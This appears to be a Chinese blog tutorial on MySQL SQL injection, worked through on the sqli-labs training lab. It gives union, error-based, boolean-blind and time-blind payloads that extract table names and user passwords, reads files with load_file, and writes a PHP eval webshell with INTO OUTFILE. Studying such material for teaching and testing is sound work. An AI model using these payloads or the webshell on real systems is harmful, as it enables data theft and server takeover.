{"id":56537,"date":"2025-08-14T20:15:28","date_gmt":"2025-08-14T12:15:28","guid":{"rendered":"https:\/\/www.wsisp.com\/helps\/56537.html"},"modified":"2025-08-14T20:15:28","modified_gmt":"2025-08-14T12:15:28","slug":"sql%e6%b3%a8%e5%85%a5","status":"publish","type":"post","link":"https:\/\/www.wsisp.com\/helps\/56537.html","title":{"rendered":"SQL\u6ce8\u5165"},"content":{"rendered":"

\u672c\u6587\u7ae0\u4e3b\u8981\u4ee5MySQL\u6570\u636e\u5e93\u7684\u6ce8\u5165\u5206\u6790<\/p>\n

\u4e00\u5e93\u4e09\u8868\u516d\u5b57\u6bb5(MySQL):<\/h3>\n

information\u2014\u2014schema:\u5b83\u662f\u6570\u636e\u5e93\u81ea\u5e26\u7684 \u201c\u5143\u6570\u636e\u4fe1\u606f\u5e93\u201d,\u5b58\u50a8\u7740\u5f53\u524d\u6570\u636e\u5e93\u5b9e\u4f8b\u91cc,\u5173\u4e8e\u6570\u636e\u5e93\u3001\u8868\u3001\u5b57\u6bb5\u7b49\u7ed3\u6784\u7684\u63cf\u8ff0\u4fe1\u606f,\u76f8\u5f53\u4e8e\u6570\u636e\u5e93\u7684 \u201c\u76ee\u5f55\u201d,\u8ba9\u4f60\u80fd\u67e5\u8be2\u6570\u636e\u5e93\u81ea\u8eab\u7684\u7ed3\u6784\u7ec6\u8282 \u3002
\nschemata \u8868:\u5b58\u6570\u636e\u5e93(\u6a21\u5f0f)\u7684\u57fa\u672c\u4fe1\u606f,schema_name \u5b57\u6bb5\u5c31\u662f\u5177\u4f53\u6570\u636e\u5e93\u7684\u540d\u79f0,\u67e5\u6709\u54ea\u4e9b\u6570\u636e\u5e93\u65f6\u53ef\u4ece\u8fd9\u53d6\u3002
\ntables \u8868:\u8bb0\u5f55\u8868\u7684\u4fe1\u606f,table_name \u662f\u8868\u540d,table_schema \u8868\u793a\u8fd9\u5f20\u8868\u6240\u5c5e\u7684\u6570\u636e\u5e93\u540d,\u60f3\u77e5\u9053\u67d0\u4e2a\u5e93\u6709\u54ea\u4e9b\u8868,\u5c31\u67e5\u8fd9\u91cc\u3002
\ncolumns \u8868:\u5b58\u5b57\u6bb5(\u5217)\u4fe1\u606f,column_name \u662f\u5b57\u6bb5\u540d,table_name \u662f\u5b57\u6bb5\u6240\u5c5e\u7684\u8868\u540d,table_schema \u662f\u5b57\u6bb5\u6240\u5c5e\u7684\u6570\u636e\u5e93\u540d,\u67e5\u67d0\u8868\u6709\u54ea\u4e9b\u5b57\u6bb5\u3001\u5b57\u6bb5\u5c5e\u4e8e\u54ea\u4e2a\u5e93 \/ \u8868,\u9760\u5b83\u3002
\n\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"<\/p>\n

\u6ce8\u5165\u70b9\u5224\u65ad(\u8fd9\u91cc\u4ee5sqli-labs\u4e3a\u80cc\u666f\u8bb2\u89e3):<\/h3>\n

SQL\u6ce8\u5165\u6709\u9996\u5148\u8981\u5224\u65ad\u6ce8\u5165\u70b9,\u6ce8\u5165\u5206\u4e3a\u6570\u5b57\u578b\u6ce8\u5165\u3001\u5b57\u7b26\u578b\u6ce8\u5165<\/p>\n

\u6570\u5b57\u578b\u6ce8\u5165:<\/h4>\n

\u540e\u7aef SQL \u8bed\u53e5\u4e2d,\u53c2\u6570id\u672a\u88ab\u5f15\u53f7\u5305\u88f9,\u4f8b\u5982:<\/p>\n

select * from users where id=1(\u53c2\u6570\u76f4\u63a5\u4f5c\u4e3a\u6570\u5b57\u53c2\u4e0e\u67e5\u8be2)<\/p>\n

\u6b64\u65f6\u5728 URL \u540e\u6dfb\u52a0and 1=1\u6216and 1=2(\u5982?id=1 and 1=2),\u82e5\u9875\u9762\u8fd4\u56de\u7ed3\u679c\u4e0d\u540c,\u53ef\u521d\u6b65\u5224\u65ad\u4e3a\u6570\u5b57\u578b\u6ce8\u5165\u70b9\u3002<\/p>\n

\u5b57\u7b26\u578b\u6ce8\u5165:<\/h4>\n

\u540e\u7aef SQL \u8bed\u53e5\u4e2d,\u53c2\u6570id\u88ab\u5f15\u53f7(\u5355\u5f15\u53f7\u2019\u3001\u53cc\u5f15\u53f7")\u6216\u62ec\u53f7 + \u5f15\u53f7\u7ec4\u5408\u5305\u88f9,\u4f8b\u5982:<\/p>\n

select * from users where id='1'(\u5355\u5f15\u53f7\u5305\u88f9)
\nselect * from users where id=("1")(\u62ec\u53f7 + \u53cc\u5f15\u53f7\u5305\u88f9)<\/p>\n

\u6b64\u65f6\u6dfb\u52a0\u5355\u5f15\u53f7\u2019(\u5982?id=1\u2019)\u4f1a\u5bfc\u81f4 SQL \u8bed\u53e5\u8bed\u6cd5\u9519\u8bef(\u5f15\u53f7\u4e0d\u95ed\u5408),
\n\u53d8\u6210select * from users where id=\u20181\u2019',\u8fdb\u800c\u89e6\u53d1\u6570\u636e\u5e93\u62a5\u9519,\u4ee5\u6b64\u5224\u65ad\u4e3a\u5b57\u7b26\u578b\u6ce8\u5165\u70b9\u3002
\n\u82e5\u6dfb\u52a0\u2019\u62a5\u9519:\u8bf4\u660e\u53c2\u6570\u88ab\u5355\u5f15\u53f7\u5305\u88f9(\u5982id=\u20181\u2019);
\n\u82e5\u6dfb\u52a0"\u62a5\u9519:\u8bf4\u660e\u53c2\u6570\u88ab\u53cc\u5f15\u53f7\u5305\u88f9(\u5982id=\u201c1\u201d);
\n\u82e5\u6dfb\u52a0)\u62a5\u9519:\u8bf4\u660e\u53c2\u6570\u88ab\u62ec\u53f7 + \u5f15\u53f7\u5305\u88f9(\u5982id=(\u20181\u2019),\u6dfb\u52a0)\u540e\u53d8\u4e3aid=(\u20181\u2019)\u2018),\u8bed\u6cd5\u9519\u8bef);
\n\u7ec4\u5408\u4f7f\u7528(\u5982\u2019) \u201c))\u7b49):\u7528\u4e8e\u5e94\u5bf9\u66f4\u590d\u6742\u7684\u5305\u88f9\u65b9\u5f0f(\u5982id=((\u201c1\u201d)),\u6dfb\u52a0\u201d))\u53ef\u6253\u7834\u95ed\u5408)\u3002<\/p>\n

\u6ce8\u610f:<\/h4>\n

\u67d0\u4e2a\u5b57\u7b26\u80fd\u6253\u7834\u540e\u7aef\u8bed\u6cd5\u95ed\u5408\u5bfc\u81f4\u62a5\u9519,\u8bf4\u660e\u8be5\u5b57\u7b26\u5bf9\u5e94\u7684\u5305\u88f9\u65b9\u5f0f\u5b58\u5728,\u8fdb\u800c\u786e\u8ba4\u6ce8\u5165\u70b9\u7c7b\u578b(\u56e0\u4e3a\u6ce8\u5165\u7684\u7279\u6b8a\u5b57\u7b26\u7834\u574f\u4e86\u539f\u6709 SQL \u8bed\u53e5\u7684\u8bed\u6cd5\u7ed3\u6784,\u5bfc\u81f4\u6570\u636e\u5e93\u65e0\u6cd5\u6b63\u5e38\u89e3\u6790\u6267\u884c,\u4ece\u800c\u89e6\u53d1\u8bed\u6cd5\u9519\u8bef\u3002)
\n\u4f20\u53c2\u65b9\u5f0f:
\n\u4f20\u53c2\u65b9\u5f0f\u6709\u5f88\u591a\u79cd,\u5e38\u7528\u7684\u6709get\u578b\u3001post\u578b\u3001cookie\u3001User-Agent\u7b49\u65b9\u5f0f,\u6ce8\u5165\u7684\u5185\u5bb9\u4e5f\u6839\u636e\u5b9e\u9645\u60c5\u51b5\u4e0d\u901a\u4f7f\u7528\u4e0d\u540c\u7684\u4f20\u53c2\u65b9\u5f0f<\/p>\n

\u8054\u5408\u6ce8\u5165:\u7b2c\u4e00\u5173<\/h3>\n

\u7b2c\u4e00\u5173(get\u5f62\u5f0f\u4f20\u53c2)
\n\u8865\u5145:
\ngroup_concat(field1,field2,\u2026)\u4f5c\u7528:\u5c06\u591a\u4e2a\u67e5\u8be2\u7ed3\u679c\u8fde\u63a5\u6210\u4e00\u884c
\n\u53c2\u6570field:\u9700\u8981\u53c2\u4e0e\u62fc\u63a5\u7684\u5b57\u6bb5\u540d(\u53ef\u4ee5\u4e00\u4e2a\u6216\u8005\u591a\u4e2a),<\/p>\n

  • \n

    \u5224\u65ad\u6ce8\u5165\u70b9
    \n\u7528\u2019 \u201c ) )) \u56db\u79cd\u65b9\u5f0f\u548c\u5355\u53cc\u5f15\u53f7+\u62ec\u53f7\u7684\u7ec4\u5408\u6765\u5224\u65ad,\u54ea\u4e2a\u9519\u4e86,\u54ea\u4e2a\u5c31\u662f\u6ce8\u5165\u70b9,\u5982\u679c\u90fd\u9519\u4e86,\u90a3\u5c31\u662f\u6570\u5b57\u578b\u6ce8\u5165\u70b9
    \nhttp:\/\/127.0.0.1:8888\/sqli\/Less-1\/?id=1\u2019\u62a5\u9519<\/p>\n<\/li>\n

  • \n

    \u5224\u65ad\u5217\u6570(\u5b57\u6bb5\u6570):
    \nhttp:\/\/127.0.0.1:8888\/sqli\/Less-1\/?id=1\u2019 order by 3\u2013+
    \n\u6ce8\u610f:\u8fd9\u4e2a\u2019\u2013+\u2019\u5728get\u4f20\u53c2\u4e0d\u80fd\u6f0f,\u5426\u5219\u8fd9\u91cc\u4f1a\u62a5\u9519
    \n\u7b2c\u56db\u4e2a\u5f00\u59cb\u51fa\u73b0\u9519\u8bef,\u90a3\u4e48\u8fd9\u4e2a\u5b57\u6bb5\u5c31\u53ea\u6709\u4e09\u4e2a
    \n\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"<\/p>\n<\/li>\n

  • \n

    \u770b\u56de\u663e:<\/p>\n<\/li>\n

    http:\/\/127.0.0.1:8888\/sqli\/Less-1\/?id=-1\u2019 union select 1,2,3 –+<\/p>\n

    \u8054\u5408\u6ce8\u5165\u6700\u91cd\u8981\u7684\u4e00\u6b65,\u8be5\u6b65\u9aa4\u4e0d\u6210\u529f\u6216\u8005\u59cb\u7ec8\u663e\u793a\u548c\u524d\u9762\u540c\u4e00\u4e2a\u9875\u9762,\u4e0d\u662f\u8054\u5408\u6ce8\u5165
    \n\u8fd8\u6709\u8fd9\u4e2aid=-1\u2019\u8fd9\u91cc\u4e00\u5b9a\u8981\u8d1f\u4e00
    \n\u67e5\u770b\u6570\u636e\u5e93\u548c\u7248\u672c:<\/p>\n

    http:\/\/127.0.0.1:8888\/sqli\/Less-1\/?id=-1\u2019 union select 1,database(),version() –+<\/p>\n

    \"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"
    \n\u524d\u9762\u56de\u663e\u91cc\u628a2\u548c3\u56de\u663e\u51fa\u6765\u4e86,\u8fd9\u91cc\u6211\u4eec\u57282\u548c3\u7684\u4f4d\u7f6e\u8fdb\u884c\u66ff\u6362\u6210database()\u548cversion()
    \n\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"<\/p>\n

  • \u7206\u5e93(\u62ff\u5230\u6240\u6709\u8868):<\/li>\n

    http:\/\/127.0.0.1:8888\/sqli\/Less-1\/?id=-1\u2019 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=\u2018security\u2019),3 –+<\/p>\n

    \u6216\u8005<\/p>\n

    http:\/\/127.0.0.1:8888\/sqli\/Less-1\/?id=-1\u2019union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=\u2018security\u2019\u2013+<\/p>\n

    \"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"<\/p>\n

  • \u7206\u5b57\u6bb5(\u62ff\u5230\u6240\u6709\u5217):<\/li>\n

    http:\/\/127.0.0.1:8888\/sqli\/Less-1\/?id=-1\u2019 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=\u2018security\u2019 and table_name=\u2018users\u2019),3 –+<\/p>\n

    \"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"<\/p>\n

  • \u83b7\u53d6\u8d26\u53f7\u5bc6\u7801:<\/li>\n

    ?id=-1\u2019 union select 1,(select group_concat(username,id,password) from security.users),3 –+
    \n?id=-1\u2019 union select 1,(select group_concat(username,id,password) from users),3 –+<\/p>\n

    \"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"<\/p>\n

    \u6587\u4ef6\u8bfb\u53d6(\u8054\u5408\u6ce8\u5165\u4e0b\u7684\u6587\u4ef6\u8bfb\u53d6):<\/h3>\n

    \u6761\u4ef6:
    \n1.\u5f53\u6709\u663e\u793a\u5217\u7684\u65f6\u5019,\u6587\u4ef6\u8bfb\u53ef\u4ee5\u5229\u7528union\u6ce8\u5165
    \n2.\u6ca1\u6709\u663e\u793a\u5217\u7684\u65f6\u5019,\u53ea\u80fd\u5229\u7528\u76f2\u6ce8\u8fdb\u884c\u8bfb\u53d6<\/p>\n

    union\u6ce8\u5165\u8bfb\u53d6\u6587\u4ef6(load_file)<\/h4>\n

    ?id=-1\u2019 union select 1,2,load_file(\u201cD:\/phpstudy_pro\/WWW\/sqli\/kkk.txt\u201d) –+
    \n\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"<\/p>\n

    \u7406\u8bba\u4e0a\u5e94\u8be5\u662f\u6210\u529f\u7684,\u4e0d\u77e5\u9053\u4e3a\u4ec0\u4e48\u8fd9\u91cc\u4e0d\u663e\u793a
    \n\u8fd9\u91cc\u8fd9\u4e2a\u6587\u4ef6\u8def\u5f84"D:\/phpstudy_pro\/WWW\/sqli\/kkk.txt"\u53ef\u4ee5\u53d8\u6210\u5341\u516d\u8fdb\u5236
    \nunion\u6ce8\u5165\u5199\u5165\u4e00\u53e5\u8bdd\u6728\u9a6c(into outfile)
    \n\/\/\u5229\u7528union\u6ce8\u5165\u5199\u5165\u4e00\u53e5\u8bdd\u6728\u9a6c into outfile \u548c into dumpfile \u90fd\u53ef\u4ee5
    \nhttp:\/\/127.0.0.1\/sqli\/Less-1\/?id=-1\u2019 union select 1,2,\u2018<?php @eval($_POST[aaa]);?>\u2019 into outfile \u2018L:\/4.php\u2019 #
    \n\/\/ \u53ef\u4ee5\u5c06\u4e00\u53e5\u8bdd\u6728\u9a6c\u8f6c\u6362\u621016\u8fdb\u5236\u7684\u5f62\u5f0f
    \nhttp:\/\/127.0.0.1\/sqli\/Less-1\/?id=-1\u2019 union select 1,2,0x3c3f70687020406576616c28245f504f53545b6161615d293b3f3e into outfile \u2018L:\/4.php\u2019 #<\/p>\n

    \u76f2\u6ce8\u8bfb\u53d6\u6587\u4ef6<\/h4>\n

    \/\/\u76f2\u6ce8\u8bfb\u53d6\u7684\u8bdd\u5c31\u662f\u5229\u7528hex\u51fd\u6570,\u5c06\u8bfb\u53d6\u7684\u5b57\u7b26\u4e32\u8f6c\u6362\u621016\u8fdb\u5236,\u518d\u5229\u7528ascii\u51fd\u6570,\u8f6c\u6362\u6210ascii\u7801,\u518d\u5229\u7528\u4e8c\u5206\u6cd5\u4e00\u4e2a\u4e00\u4e2a\u7684\u5224\u65ad\u5b57\u7b26,\u5f88\u590d\u6742,\u4e00\u822c\u7ed3\u5408\u5de5\u5177\u5b8c\u6210
    \nhttp:\/\/127.0.0.1\/sqli\/Less-1\/?id=-1\u2019 and ascii(mid((select hex(load_file(\u2018e:\/3.txt\u2019))),18,1))>49#\u2019 LIMIT 0,1<\/p>\n

    \u62a5\u9519\u6ce8\u5165:\u7b2c\u4e00\u5173<\/h3>\n

    \u8865\u5145
    \nupdatexml(XML_document, XPath_string, new_value)
    \n\u7b2c\u4e00\u4e2a\u53c2\u6570:XML_document \u662f String \u683c\u5f0f,\u4e3a XML \u6587\u6863\u5bf9\u8c61\u7684\u540d\u79f0,\u6587\u4e2d\u4e3a Doc 1
    \n\u7b2c\u4e8c\u4e2a\u53c2\u6570:XPath_string (Xpath \u683c\u5f0f\u7684\u5b57\u7b26\u4e32) ,\u5982\u679c\u4e0d\u4e86\u89e3 Xpath \u8bed\u6cd5,\u53ef\u4ee5\u5728\u7f51\u4e0a\u67e5\u627e\u6559\u7a0b\u3002
    \n\u7b2c\u4e09\u4e2a\u53c2\u6570:new_value,String \u683c\u5f0f,\u66ff\u6362\u67e5\u627e\u5230\u7684\u7b26\u5408\u6761\u4ef6\u7684\u6570\u636e<\/p>\n

  • \n

    \u5224\u65ad:
    \n?id=1\u2019
    \n\u5224\u65ad\u662f\u5426\u4e3a\u62a5\u9519\u6ce8\u5165,\u5728\u5730\u5740\u680f\u91cc\u8f93\u5165\u2019 \u201c ) )) \u56db\u79cd\u65b9\u5f0f\u6216\u8005\u5355\u53cc\u5f15\u53f7+\u62ec\u53f7\u7684\u7ec4\u5408\u6765\u5224\u65ad,\u54ea\u4e2a\u9519\u4e86,\u54ea\u4e2a\u5c31\u662f\u6ce8\u5165\u70b9
    \n\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"<\/p>\n<\/li>\n

  • \n

    \u9a8c\u8bc1:
    \n?id=1\u2019 and updatexml(1,0x7e,3); –+
    \n\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"
    \n\u6b63\u5e38\u62a5\u9519,\u4e3a\u62a5\u9519\u6ce8\u5165
    \n\u7206\u5e93(\u83b7\u53d6\u6240\u6709\u8868\u540d):
    \n\u83b7\u53d6\u5f53\u524d\u6570\u636e\u5e93?id=-1\u2019 and updatexml(1,concat(\u2018~\u2019,database()),3) \u2013 +<\/p>\n<\/li>\n

  • \n

    \u62ff\u8868<\/p>\n<\/li>\n

    ?id=-1\u2019 and updatexml(1,concat(\u2018~\u2019, substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) , 1 , 31) ),3) \u2013 +<\/p>\n

    ?id=1\u2019 and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)) –+\u7206\u8868\u51fa\u2019emails,referers,uagents,users<\/sub>\u2019<\/p>\n

    ?id=1\u2019 and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=\u2018security\u2019),0x7e),1)) –+\u6362\u6210\u8fd9\u4e2a\u4e5f\u4e00\u6837,\u56e0\u4e3a\u5c31\u662f\u4e0a\u9762\u7684\u5e93\u540d<\/p>\n

    \"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"<\/p>\n

  • \u7206\u5b57\u6bb5<\/li>\n

    ?id=1\u2019 and (updatexml(1,concat(0x7e,(select group_concat(column_name)
    \nfrom information_schema.columns where table_schema=\u2018security\u2019 and
    \ntable_name =\u2018users\u2019),0x7e),1)) –+\u7206\u51fa\u5b57\u6bb5\u2019id,username,password<\/sub>\u2019
    \n?id=-1\u2019 and updatexml(1,concat(\u2018~\u2019,
    \nsubstr((select users
    \nfrom security ) , 1 , 31) ),3) \u2013 a<\/p>\n

    Substr(string,start,number)
    \nString:\u8981\u622a\u53d6\u7684\u5b57\u7b26\u4e32,start:\u4ece\u54ea\u4e2a\u4f4d\u7f6e\u5f00\u59cb\u622a\u53d6,number:\u622a\u53d6\u7684\u6570\u91cf<\/p>\n

  • \u83b7\u53d6\u8d26\u53f7\u5bc6\u7801:
    \n?id=1\u2019 and (updatexml(1,concat(0x5c,(select group_concat(password,id,username) from users),0x5c),1)) –+
    \n\u62a5\u9519\u6ce8\u5165\u4e2d\u5e38\u89c1\u7684\u62a5\u9519\u51fd\u6570
    \nMySQL<\/li>\n

    \u6ce8\u610f:<\/h4>\n

    \u62a5\u9519\u6ce8\u5165\u5229\u7528\u7684\u51fd\u6570\u6709\u5f88\u591a:
    \nXpath\u683c\u5f0f\u62a5\u9519:updatexml()\u3001extractvalue()
    \n\u4e3b\u952e\u91cd\u590d\u62a5\u9519:floor()
    \n\u6570\u636e\u6ea2\u51fa\u62a5\u9519:exp()
    \n\u975e\u51e0\u4f55\u53c2\u6570\u62a5\u9519:multipoint()\u3001polygon()\u7b49
    \n\u5217\u540d\u91cd\u590d\u62a5\u9519:join\u3001name_const()
    \nSQLserver:
    \nconvert(); \u7528\u6765\u7c7b\u578b\u8f6c\u6362,\u7b2c\u4e8c\u4e2a\u53c2\u6570\u5305\u542b\u7279\u6b8a\u5b57\u7b26\u4f1a\u62a5\u9519
    \ncast(); \u7528\u6765\u7c7b\u578b\u8f6c\u6362,\u53c2\u6570\u5305\u542b\u7279\u6b8a\u5b57\u7b26\u4f1a\u62a5\u9519
    \nOracle:
    \n\u6ca1\u6709\u62a5\u9519\u51fd\u6570,\u53ef\u4ee5\u7528\u6bd4\u8f83\u8fd0\u7b97\u7b26\u62a5\u9519
    \nAccess:
    \n\u4e0d\u652f\u6301\u62a5\u9519\u6ce8\u5165,\u53ea\u80fd\u4f7f\u7528\u679a\u4e3e<\/p>\n

    \u5e03\u5c14\u76f2\u6ce8:\u7b2c\u516b\u5173<\/h3>\n

    \u65f6\u95f4\u76f2\u6ce8\u4f7f\u7528\u5230length()\u3001ascii()\u3001substr()\u3001group_concat()\u4e09\u4e2a\u51fd\u6570
    \n\u4f7f\u7528\u6761\u4ef6:
    \n\u9875\u9762\u6ca1\u6709\u56de\u663e\u4f4d\u7f6e(\u8054\u5408\u6ce8\u5165\u65e0\u6cd5\u4f7f\u7528),\u6ca1\u6709\u62a5\u9519\u4fe1\u606f(\u62a5\u9519\u6ce8\u5165\u65e0\u6cd5\u4f7f\u7528),\u9875\u9762\u53ea\u6709\u767b\u5f55\u6210\u529f\u548c\u5931\u8d25\u4e24\u79cd
    \n\u5224\u65ad:
    \n\u8f93\u5165 \u2018 \u201c ) ))\u6216\u8005\u5355\u53cc\u5f15\u53f7\u548c\u5355\u53cc\u62ec\u53f7\u7684\u4e24\u4e24\u7ed3\u5408\u5224\u65ad,\u6b63\u786e\u7684\u5373\u4e3a\u6ce8\u5165\u70b9<\/p>\n

  • \u5224\u65ad\u6ce8\u5165\u70b9<\/li>\n

    \u8f93\u5165?id=1\u201d\u663e\u793a\u6210\u529f
    \n\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"<\/p>\n

  • \u5224\u65ad\u957f\u5ea6
    \n?id=1\u2019 and length((select database()))=8\u2013+
    \n\u8fd9\u4e2a\u5224\u65ad\u6761\u4ef6\u6839\u636e\u5b9e\u9645\u60c5\u51b5\u6539\u53d8<\/li>\n
  • \u5224\u65ad\u4e0e\u679a\u4e3e\u5b57\u7b26
    \n\u62ff\u5e93
    \n\u5224\u65ad\u5e93\u957f\u5ea6
    \n?id=1\u2019 and length((select database()))=8\u2013+
    \n\u9010\u4e00\u786e\u5b9a\u5e93\u5b57\u7b26<\/li>\n

    ?id=1\u2019and ascii(substr((select database()),1,1))=115\u2013+ \u2192s ?id=1\u2019and
    \nascii(substr((select database()),2,1))=101\u2013+ \u2192e ?id=1\u2019and
    \nascii(substr((select database()),3,1))=99\u2013+ \u2192c \u2026 ?id=1\u2019and
    \nascii(substr((select database()),8,1))=121\u2013+ \u2192y<\/p>\n

    \u62ff\u8868
    \n\u5224\u65ad\u8868\u957f\u5ea6<\/p>\n

    ?id=1\u201d and length((select group_concat(table_name) from
    \ninformation_schema.tables where table_schema=database()))>13\u2013+<\/p>\n

    \u9010\u4e00\u786e\u5b9a\u8868\u5b57\u7b26<\/p>\n

    ?id=1\u201d and ascii(substr((select group_concat(table_name) from
    \ninformation_schema.tables where table_schema=database()),1,1))>99\u2013+<\/p>\n

    \u62ff\u5b57\u6bb5
    \n\u5224\u65ad\u5b57\u6bb5\u540d\u957f\u5ea6<\/p>\n

    ?id=1\u201d and length((select group_concat(column_name) from
    \ninformation_schema.columns where table_schema=database() and
    \ntable_name=\u2018users\u2019))>20\u2013+<\/p>\n

    \u9010\u4e00\u5224\u65ad\u5b57\u6bb5\u5177\u4f53\u503c<\/p>\n

    ?id=1\u201d and ascii(substr((select group_concat(column_name) from
    \ninformation_schema.columns where table_schema=database() and
    \ntable_name=\u2018users\u2019),1,1))>99\u2013+<\/p>\n

    \u62ff\u6570\u636e
    \n\u5224\u65ad\u6570\u636e\u957f\u5ea6<\/p>\n

    ?id=1\u201d and length((select group_concat(username,password) from
    \nusers))>109\u2013+<\/p>\n

    \u9010\u4e00\u62ff\u5230\u5b57\u6bb5\u5177\u4f53\u503c<\/p>\n

    ?id=1\u2019 and ascii(substr((select group_concat(username,password) from
    \nusers),1,1))>50\u2013+<\/p>\n

    \u5f0a\u7aef:
    \n\u65f6\u95f4\u590d\u6742\u5ea6\u5927,\u6d88\u8017\u65f6\u95f4\u5de8\u5927
    \n\u4e00\u822c\u7f16\u5199\u811a\u672c\u548c\u4f7f\u7528sqlmap\u7206\u7834<\/p>\n

    \u65f6\u95f4\u76f2\u6ce8(\u5ef6\u65f6\u6ce8\u5165):\u7b2c\u4e5d\u5173<\/h3>\n

    \u65f6\u95f4\u76f2\u6ce8\u4f7f\u7528\u5230length()\u3001ascii()\u3001substr()\u3001group_concat()\u4e09\u4e2a\u51fd\u6570
    \n\u4f7f\u7528\u6761\u4ef6:
    \n\u65e0\u56de\u663e(\u8054\u5408\u6ce8\u5165\u65e0\u6cd5\u4f7f\u7528)
    \n\u65e0\u62a5\u9519\u4fe1\u606f(\u62a5\u9519\u6ce8\u5165\u65e0\u6cd5\u4f7f\u7528)
    \n\u65e0\u8bba\u6210\u529f\u6216\u8005\u5931\u8d25,\u9875\u9762\u53ea\u54cd\u5e94\u4e00\u79cd\u7ed3\u679c(\u5e03\u5c14\u6ce8\u5165\u65e0\u6cd5\u4f7f\u7528)<\/p>\n

  • \u5224\u65ad
    \n\u4f7f\u7528\u2019 \u201c ) ))\u6216\u8005\u5355\u53cc\u5f15\u53f7\u7684\u4e24\u4e24\u7ec4\u5408\u5747\u8fd4\u56de\u4e00\u79cd\u9875\u9762
    \n\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"<\/li>\n
  • \u5224\u65ad\u6ce8\u5165\u70b9
    \n\u4f7f\u7528?id=1\u2019and if(1,sleep(5),3) –+
    \n\u524d\u9762id=1\u2019\u662f\u5224\u65ad\u6ce8\u5165\u70b9,\u540e\u9762if(1,sleep(5),3)\u662f\u5ef6\u65f6\u6ce8\u5165\u7684\u6761\u4ef6
    \n\u5982\u679c\u8be5\u8bed\u53e5\u88ab\u6210\u529f\u6267\u884c\u4f1a\u57285\u79d2\u540e\u5237\u65b0\u9875\u9762<\/li>\n
  • \u5224\u65ad\u957f\u5ea6\u4e0e\u679a\u4e3e
    \n\u53d6\u5e93
    \n\u5224\u65ad\u5e93\u957f\u5ea6<\/li>\n

    ?id=1' and if((length(database())>1),sleep(5),3) — +<\/p>\n

    length(database())>1,\u8fd9\u91cc\u76841,\u4f9d\u6b21\u9012\u589e,
    \n\u672c\u5173\u5c31\u662flength(database())>7,\u5ef6\u65f65\u79d2\u8fd4\u56de,length(database())>8\u76f4\u63a5\u8fd4\u56de,\u5219\u5e93\u7684\u957f\u5ea6\u4e3a8\u4f4d(security)
    \n\u9010\u4e00\u5224\u65ad\u5e93\u540d\u7684\u5177\u4f53\u5b57\u7b26<\/p>\n

    ?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)–+ \u2192s
    \n?id=1'and if(ascii(substr((select database()),2,1))=101,sleep(5),1)–+ \u2192e
    \n?id=1'and if(ascii(substr((select database()),1,1))=99,sleep(5),1)–+ \u2192c
    \n?id=1'and if(ascii(substr((select database()),1,1))=121,sleep(5),1)–+ \u2192y<\/p>\n

    \u53d6\u8868
    \n\u5224\u65ad\u8868\u957f\u5ea6<\/p>\n

    ?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)–+
    \n?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>29,sleep(5),1)–+\u7acb\u5373\u8fd4\u56de,\u5219\u8868\u540d\u957f\u5ea6\u4e3a29
    \n\u9010\u4e00\u53d6\u8868\u540d\u5177\u4f53\u5b57\u7b26(\u540c\u4e0a)
    \n?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)–+<\/p>\n

    \u53d6\u5b57\u6bb5
    \n\u5224\u65ad\u5b57\u6bb5\u957f\u5ea6<\/p>\n

    ?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)–+<\/p>\n

    \u9010\u4e00\u53d6\u5b57\u6bb5\u540d<\/p>\n

    ?id=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)–+<\/p>\n

    \u62ff\u6570\u636e
    \n\u5224\u65ad\u6570\u636e\u957f\u5ea6<\/p>\n

    ?id=1' and if(length(select group_concat(username,password) from users))>109 –+<\/p>\n

    \u9010\u4e00\u786e\u5b9a\u5177\u4f53\u503c<\/p>\n

    ?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)–+<\/p>\n

    \u5f0a\u7aef:
    \n\u65f6\u95f4\u590d\u6742\u5ea6\u5927,\u6d88\u8017\u65f6\u95f4\u5de8\u5927
    \n\u5bb9\u6613\u53d7\u7f51\u7edc\u6ce2\u52a8\u7b49\u56e0\u7d20\u5f71\u54cd
    \n\u4e00\u822c\u7f16\u5199\u811a\u672c\u548c\u4f7f\u7528sqlmap\u7206\u7834<\/p>\n

    \u76f2\u6ce8\u4e4b\u6b63\u5219\u8868\u8fbe\u5f0f\u4f7f\u7528<\/h4>\n

    \u67e5\u627ename\u5b57\u6bb5\u4e2d\u4ee5'st'\u4e3a\u5f00\u5934\u7684\u6240\u6709\u6570\u636e
    \nmysql>SELECT name FRoM person tbl WHERE name REGEXP '^st';
    \n\u67e5\u627ename\u5b57\u6bb5\u4e2d\u4ee5'ok'\u4e3a\u7ed3\u5c3e\u7684\u6240\u6709\u6570\u636e
